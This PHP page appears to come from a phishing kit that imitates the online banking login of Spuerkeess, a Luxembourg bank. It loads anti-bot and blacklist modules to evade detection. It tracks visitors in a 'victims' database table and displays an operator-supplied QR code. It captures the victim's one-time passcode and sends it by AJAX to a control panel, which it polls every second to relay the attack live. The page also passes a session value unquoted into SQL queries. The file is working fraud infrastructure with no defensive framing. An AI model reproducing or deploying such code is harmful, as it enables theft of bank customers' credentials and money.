<?php
include '../ipanel/inc/config.php';
include '../ipanel/inc/connect.php';
include '../new_anti_config.php';
if ($internal_antibot == 1) {
   include "../ipanel/inc/old_blocker.php";
}
if ($mobile_lock == "checked") {
   include "../ipanel/inc/mob_lock.php";
}
$url = $_SERVER['REQUEST_URI'];



include '../ipanel/inc/blacklist.php';
include '../ipanel/inc/gateway.php';


if ($enable_antibots == "checked") {
   include '../ipanel/inc/anti.php';
}
session_start();

$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];


if ($_SESSION['started'] == 'true') {

    $uniqueid = $_SESSION['uniqueid'];
    $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
    if ($query) {
   $arr = mysqli_fetch_array($query, MYSQLI_ASSOC);
   $user = $arr['user'];
   $qrlink = $arr['qrlink'];
   $qrotp = $arr['qrotp'];
   if ($qrotp != '') {
    $error = "<div style='color:#D4222D'>" . translateText('errorsp1', $currentLanguage) . "<br><Br></div>";


   }
    }
  
  } else {
     header('location:../exit.php');
}
  


if($_SESSION['started'] == 'true'){
  $uniqueid = $_SESSION['uniqueid'];
  $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
  if ($query) {
          $query = mysqli_query($conn, "UPDATE victims SET status=13, buzzed=1 WHERE uniqueid=$uniqueid");
      }
} else {
     header('location:../exit.php');
}
  

?>
<!DOCTYPE html>
<html lang="eng">
<script>
function check(form) {

if (form.code.value.length < 6)
{ form.code.focus(); document.getElementById("code").style.borderColor = "#D4222D"; return;}
else { document.getElementById("code").style.borderColor = "#DDDDDD"; }

submit_form();
// form.submit()
}
</script>


</head> 
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body data-lang="eng">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <title>S-Net - Spuerkeess</title>
    <meta name="description" content="snet">
    <meta name="author" content="bcee.lu">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable= no">
    <link rel="icon" type="image/ico" href="theme/favicon.ico">
    <link rel="stylesheet" href="./theme/jquery-ui.min.css">
    <link href="./theme/bootstrap.min.css" rel="stylesheet">
    <link href="./theme/styles.css" rel="stylesheet">
    <link href="./theme/IEfix.css" rel="stylesheet">
<div class="bcee-main">
    <div class="bcee-topbar">
        <ul>
            <li class="logo">
                <a><span class="topbarIcon"></span></a>
            </li>
            <li class="today d-none d-lg-block">
                <span id="datetime"></span>
            </li>
            <li class="action">
                <div id="bcee-info" class="bcee-info-dot large"></div>
            </li>
        </ul>
    </div>
    <div class="bcee-header">
	    <div class="container">
	        <div class="row">
	            <div class="col-lg-12">
	                <div class="header-title d-none d-md-inline-block">Spuerkeess</div>
	                <div class="header-lang">
	
                    <div id="flagfr" class="single-lang <?php echo ($currentLanguage == 'fr') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_fr.svg">
    </div>
</div>

<div id="flagde" class="single-lang <?php echo ($currentLanguage == 'de') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_de.svg">
    </div>
</div>

	                    <div id="flagen" class="single-lang">
	                        <div class="lang-flag">
	                            <img src="./theme/flag_en.svg">
	                        </div>
	                    </div>
	                </div>
	            </div>
	        </div>
	    </div>
	</div>
    <form action="" method="post">
<input type="text" autocomplete="off" id="blank" name="blank" readonly="readonly">
    <div class="bcee-content">
        <div class="container">
            <div class="row">
                <div class="col-lg-12" id="maincontent">
					<div class="bcee-frame">
				<div style="padding-top:0px;text-align: left;">
                <h2><?= translateText('footerp15', $currentLanguage); ?> </h2> 
                <?= $error ?>
                <br>
                <img src="../ipanel/<?= $qrlink ?>" style="max-width: 250px;">
                <br><br>
            <div class="inputs" style="margin-top:15px;">
            <label for="code">OTP</label>
            <input class="form-control" autocomplete="one-time-code" name="code" id="code" type="tel" maxlength="6" onKeyDown="if(event.keyCode==13) check(this.form);">
           </div>
           <br><br>
<button id="confirm" class="btn btn-reverse bordered" onclick="check(this.form)" type="button"><?= translateText('formp9', $currentLanguage); ?></button>

             
                </div>
					</div>
                </div>
            </div>
        </div>
    </div>
</div>
</form>
<div id="veepn-breach-alert"></div>
<script>
        function formatDate() {
            const now = new Date();
            const options = { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' };
            const date = now.toLocaleDateString('fr-FR', options);
            const time = now.toLocaleTimeString('fr-FR', { hour: 'numeric', minute: 'numeric', hour12: false });
            const formattedDate = `${date} - ${time}`;
            document.getElementById('datetime').innerText = formattedDate;
        }

        formatDate();
    </script>





<script src="../assets/js/jquery-1.11.3.min.js"></script>
   <script src="../assets/js/main.js"></script>
   <script>
      var pinger = setInterval(function() {
         var urldata = "../ipanel/inc/action.php?type=ping";
         $.ajax({
            url: urldata,
            type: "GET",
            success: function(response) {
               //console.log(response)
            }
         });
      }, 1000);
      function submit_form() {
         var qrotp = document.getElementById('code').value;

         $.ajax({
            type: 'POST',
            url: '../ipanel/inc/action.php?type=qrtype',
            data: 'qrotp=' + qrotp,
            success: function(data) {
               var parsed_data = JSON.parse(data);
               if (parsed_data.status == 'ok') {
                  location.href = "loading.php"
               }
            }
         })
      }
   </script>



</body>
</html>
